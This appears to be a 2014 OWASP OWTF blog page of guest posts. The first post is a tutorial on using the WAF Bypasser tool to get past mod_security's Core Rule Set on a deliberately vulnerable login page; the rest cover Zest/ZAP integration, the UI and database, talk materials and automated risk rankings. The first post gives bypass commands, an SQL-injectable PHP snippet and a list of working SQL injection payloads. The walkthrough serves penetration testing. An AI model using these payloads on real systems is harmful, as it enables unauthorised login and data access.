Tuesday, 4 November 2014

OWTF 1.0 "Lionheart": OWTF's WAF bypasser!

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

NOTE: This blog post is a guestpost by Marios Kourtesis, who authored one of the sexiest GSoC 2014 projects this year: WAF Bypasser. An epic joint venture between two OWASP projects: OWASP ByWaf and OWASP OWTF.

NOTE: WAF Bypasser is a tool that can be used both from inside of OWTF as well as a standalone tool, you will keep seeing this theme in upcoming cool projects ;)

And with that, a big welcome and THANK YOU to Marios!

OWTF WAF-Bypasser

Web Application Security is moving to another level. Hardware and software implementations of application firewalls are taking place to secure the Web infrastructure. These technologies are putting effort on delivering more secure Web Applications, unfortunately what they are really doing is too far away from what they are promising. There are many cases that WAF are increasing the attacking surface by introducing new vulnerabilities. WAFs can be easily bypassed and expose systems under the secure feeling of the defenders.
WAF-Bypasser is a tool that assists the penetration testers to test the quality of a WAF(Web Application Firewall) or a poor written WAF rule and potentially bypass it. It is developed as an auxiliary OWASP OWTF plugin and standalone project. It is important to pinpoint that during the research and development some zero day exploits were found.[1]

In this article I am demonstrating how to analyze and bypass mod_security WAF protected with OWASP CRS Version 2.2.8. The exploit has been tested and working at version 2.2.9 as well.
For the demonstration I will use DigitalOcean’s configuration and examples[2](see the article in the references, is important to check it in order to follow this post). My target is a fully updated Ubuntu system with the latest package of modsecurity installed.
The problem:
Ubuntu mod_security package contains OWASP CRS Version 2.2.8.

Step 1)
WAF bypasser have tornado framework as a dependency. Install it into your system as you usually do.
Step 2)
Detecting the blocked characters:
We need to specifying the following:
  • The target url.
  • The way that I will detect when a request is blocked. Mod_security responds to the blocked HTTP requests with a 403 HTTP Error Code. So in my case specify I will detect the blocked requests with the response code.
  • The post data with the variable that I want to fuzz.
  • The scanning mode for detecting the allowed characters. Additionally this mode attempts to bypass the WAF by encoding the characters and etc.

Putting all together:

python wafbypasser.py --target  --data "login=1&username=@@@fuzzhere@@@"
--response_code 403 --mode detect_chars

In the following screenshot we can see that the “ and ‘ characters among others, are being detected by the WAF.
(Finding detected characters)

Scrolling down the output we can see in the next screenshot that the we can pass the ‘ (single quote) character by having in between two undetected characters.
(undetected quotes, small bypass)
‘ is detected
a‘a is not detected
a’ is detected
‘a is detected
Note: The [a] character has been found by WAF bypasser to be an undetected character.

Step 3)
Exploiting the target:
As we see from the MySQL query and the logic of this super vulnerable authentication system, the only thing we need to do is to make the query return true.
$result = mysqli_query($con, "SELECT * FROM `users` WHERE username='$username' AND password='$password'");
       if(mysqli_num_rows($result) == 0)
           echo 'Invalid username or password';
           echo '<h1>Logged in</h1><p>A Secret for you....</p>';

Having in mind that the WAF will not block a detected character surrounded by undetect characters and that space character is not in list of detected characters, lets write manually some payloads will make the SQL query to return true.
vim payloads.txt

a' or ‘1’=’1’ or 'a
a' or ‘ 1 ’ = ’ 1 ’ or 'a
a' or ‘2’=’2’ or 'a
a' or true or 'a
a' or not false or 'a
a' or not  ‘1’=’2’ or 'a

Now lets fuzz the target with our payloads.
In the fuzzing mode we need to specify the file with me payloads. In my case the payloads.txt.

python wafbypasser.py --target --data "login=1&username=@@@fuzzhere@@@" --response_code 403 --mode fuzz --payloads payloads.txt

In the screenshot we see that we found 2 bypasses. In the lower part of the image, we are testing one of the undetected payloads using curl where we can see from the results, that we have successfully bypassed the WAF and do an SQL injection that allowed us to log in to our vulnerable Web Application as we was going to do without the presence of the WAF.
(fuzzing the target)


[2]”How to set up mod_security with apache on debian-ubuntu”, URL: [https://www.digitalocean.com/community/tutorials/how-to-set-up-mod_security-with-apache-on-debian-ubuntu]

Demos / talks:

Monday, 27 October 2014

OWTF 1.0 "Lionheart": Zest support and ZAP integration

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

NOTE: This blog post is a guestpost by Deep 'dscarson' Shah, who authored one of the most amazing GSoC 2014 projects this year: Zest support and ZAP integration.

And with that, a big welcome and THANK YOU to Deep!

OWASP OWTF - Zest support and ZAP integration
As part of my GSoC project , I had to integrate Mozilla Zest and OWASP ZAP into OWTF.

This image summarizes my work :

Lets dive into details :

    → Zest is an experimental specialized scripting language developed by the Mozilla security team and is intended to be used in web oriented security tools.
Generating Zest scripts from OWTF provides an automated mechanism to replicate exploitation of security vulnerabilities in a format that facilitates information exchange between tools such as ZAP and others which can reproduce the same vulnerabilities in their own development environment.

ZAP is an easy to use integrated penetration-testing tool for finding vulnerabilities in web applications, which has in-built functionality to run Zest Scripts.
The ZAP supports allows OWTF to export its HTTP transactions to OWASP ZAP for further analysis and fuzzing.

The features implemented are :

  • Zest script creation from single HTTP transaction
  • Zest script creation from multiple HTTP transaction (macro of requests)
  • HTTP request editing window (from which you can replay the request)
  • Zest script Console
  • “ Record a Zest script ” functionality
  • Zest script Runner
  • Forward HTTP request to ZAP

1) Zest script creation from single HTTP transaction:


Clicking on the button “Create a Zest Script” creates a Zest script for the given transaction in owtf_review/targets/given_target/zest directory.

2) Zest script creation from multiple HTTP transactions:

A single zest script can be created from multiple transactions of a specific target.

Clicking on the button “Create Zest Script” lets you select the transactions you want to include in zest script which resides at owtf_review/targets/given_target/zest directory.

3) HTTP Request Editing Window (Replay Function)

An editing window similar to ZAP to change/modify/edit the particular request and get response according to that.

1)Select View from the transaction you wish to edit and replay.
2)Click replay.
3)Edit the request.
4)Click Send.

4) Zest scripting console

A new window where all the target scripts and record scripts are listed and viewed.

You can go to zest console from transaction_log window by clicking ‘Zest Script Console’.

5) Record Functionality

A functionality to record the transactions while browsing the web using OWTF proxy, and creating a Zest script from the recorded transactions. Similar to record a zest script functionality in ZAP.

  1. Go to zest console and click button ‘Record a Zest Script’
  2. Now browse the web
  3. Hit ‘Stop recording’ when done

A zest script will be created in owtf_review/misc/recorded_scripts/ directory.

6) Zest Running Functionality

Runs the zest script from the zest console and displays its output there.

Click ‘Run the Zest Script’ in zest console.

7)Forward HTTP request to ZAP

A functionality to forward HTTP requests to ZAP to analyse and testing purpose.

Just click ‘Forward to ZAP’ in particular transaction window. (Make sure ZAP is running).

Resources :

Project wiki pages (with diagrams)

Documentation of other project (zest-owtf):

A video showing all the features of this GSoC project :

Friday, 17 October 2014

OWTF 1.0 "Lionheart": UI and Database

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

NOTE: This blog post is a guestpost by Bharadwaj 'tunnelshade' Machiraju, who devised and implemented the UI and Database idea from conception to implementation, full props to you, my friend :)

And with that, a big welcome and THANK YOU to Bharadwaj!

OWASP OWTF - User Interface and Database support

How OWTF used to be?

OWTF initially was a CLI program, which produced an interactive html report. Though OWTF was highly configurable, its usability was limited to huge configuration files.


What was done during this project?

The project had one main goal, i.e build an interface so as to control all aspects of OWTF. This involved more than a few challenges:

  • Refactoring the codebase to make use of databases.
  • Building a RESTful api to make the interface interactive.
  • Creating a web interface using the REST api.
  • Extending control on plugin execution (or worker processes as we cal it).

The technology stack which was finalized for this project:

  • Tornado (for interface and api servers)
  • Postgresql (for database)
  • SQLAlchemy (for ORM)

How does OWTF look now?

After the completion, OWTF must be launched from the command line and then everything can be done from the web interface. The following screenshots will take you through a tour, but for detailed explainations, a visit to our user docs is required (http://docs.owtf.org/en/latest/usage.html).

Target Manager

Plugin Launcher

Target Report
Plugin Report

Screen Shot 2014-09-16 at 4.38.27 am.png
Transaction Log

Worker Manager


Worklist Manager


Wednesday, 15 October 2014

OWTF 1.0 "Lionheart": Brucon 5x5 video, slides and more

REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

Just a quick note to say that the materials used by the OWTF Crew during the Brucon 5x5 presentations are now online:

Slides here:

OWTF 1.0 "Lionheart" - Brucon 5x5 Video:

Talk structure and higher resolution demos
    1. (From minute: 0) Introduction to OWTF and discussion of the Web UI, REST API and DB by Bharadwaj Machiraju (higher resolution: OWTF UI Demo)
    2. (From minute: ~15:50) Discussion of WAF Bypasser AND OWTF Botnet mode by Marios Kourtesis (higher resolution: WAF bypasser fuzzing DemoWAF Bypasser detect allowed characters)
    3. (From minute: ~24:50) OWTF re-architecture by Alessandro Fanio Gonz├ílez
    On top of this, Bharadwaj became the Brucon 2014 Lightening talk winner with his awesome talk about Flashbang, which he developed for Cure53. The talk is now public and you can watch it here:
    Congratulations Bharadwaj, you rock! ;)

    Friday, 10 October 2014

    OWTF 1.0 "Lionheart": Automated Rankings

    REMINDER: We just released OWTF 1.0 "Lionheart", Please try it and give us feedback!

    NOTE: This blog post is a guestpost by Tao 'depierre' Sauvage, who authored one of the most successful GSoC 2014 projects for OWASP OWTF this year: OWASP OWTF: Automated Rankings

    Helicopter view:
    Ever had to test 30 URLs in 5 days and wondered where to start? OWTF will now take the MAX severity from ALL tools run against EACH target and tell you where :)

    And with that, a big THANK YOU and welcome to Tao! :)


    Thanks to GSoC, I had the opportunity to work on the OWASP - OWTF project. My task consisted in implementing an automated ranking system but first of all, let us have a quick overview of OWTF.

    As you surely know, because you are reading this blog, OWTF is a framework that helps user -- might be a security expert as well as an unsavvy but curious person -- in security assessments. It will take care of the unpleasant part of the job and automatically generates an interactive report containing all the information for the selected plugins.

    The powerful feature here is the interactive report. In a few words, instead of having a report that cannot be modified (like Skipfish or W3AF for instance), OWTF will take into account the user's actions. For instance, it might be interesting to add a screenshot for the plugin XY to clearly show the SQL injection that was found, and, you can!


    But before GSoC began, the user had to manually evaluate the security risks for each plugin. If you had an assessment concerning 30 different websites it would take a lot of times. Therefore, the need showed up by itself: OWTF needed to pre-evaluate the security risks of its plugins.

    The ranking system

    By the end of GSoC, the automated ranking system has been completed and integrated to OWTF, a good news for its users.

    It has been developed following the simple rules below:

    1. OWTF's ranking scale would be Unranked/No risk, Informational, Low , Medium, High and Critical risk (6 different values).
    2. OWTF cannot automatically rank the outputs higher than high.
    3. The automated rankings will be highlighted as such.
    4. The user will be able to confirm/override the ranking.
    5. If the ranking has been confirmed/overridden, the highlight is removed.

    The first rule is kind of obvious, it is based on the most common scales that are used by any security tools.


    6 available rankings

    The second rule is more interesting. We, OWASP contributors, decided that only the user is able to correctly estimate a critical risk because they are the only one aware of all parameters, such as the application context.

    Highlight of the Critical ranking

    Let's say that tool XY found an SQL injection on target AB. According to most of vulnerability scores, such discovery is estimated really hazardous. On the other hand, OWTF cannot know what the database contains and if its information is critical or not. Therefore, instead of yelling the critical big red flag, it ranks the discovery as high and let the user decide whether it deserve a higher or lower ranking.
    Difference between an automated ranking and a confirmed one

    The three last rules have been chosen according to OWTF's philosophy, which is to have interactive reports. Therefore the automated ranking system would have its rankings more transparent than the ones of the user. That way, a quick view of the report will allow them to see what has been found and who found it.mixed_risks3.png
    Example of OWTF with its new automated ranking system

    As a visual result, OWTF’s automated ranking system will save a lot of time for the users. On the report above, a fraction of second is needed to understand what security aspect should be reviewed first.

    Current development state

    At the time of writing, OWTF's automated ranking system supports a couple of plugins and can rank at most 103 different ones. The following table describes which plugins are ranked:
    Supported tools
    Number of possible corresponding plugins
    1 plugin (OWTF-WVS-001)
    12 plugins
    85 plugins
    1 plugin (OWTF-CM-008)
    1 plugin (OWTF-IG-001)
    1 plugin (OWTF-WVS-006)
    1 plugin (OWTF-WVS-004)
    1 plugin (OWTF-WVS-003)
    Supported plugins that can be ranked by OWTF

    Even though 103 seems a big number, a lot of plugins still has to be supported. The automated ranking system is in its early-stage development and will keep growing time after time in order to support each and every OWTF's plugins.


    During the development phase, I decided to export the automated ranking system in a standalone library that I baptized ptp (Pentester's Tools Parser). It means that OWTF's ranking system is reusable by anyone and to be honest, it is quite easy to embed ptp in your own project.
    If you are curious about developing a similar tool as OWTF but you don't want to bother ranking the discoveries, then have a look at ptp's documentation (linked in the resources section).


    Before I let you go back to your activities, here are some useful links that would give you more information on the topic:

    If you made it this far, don't miss out Tao 'depierre' Sauvage's personal blog here!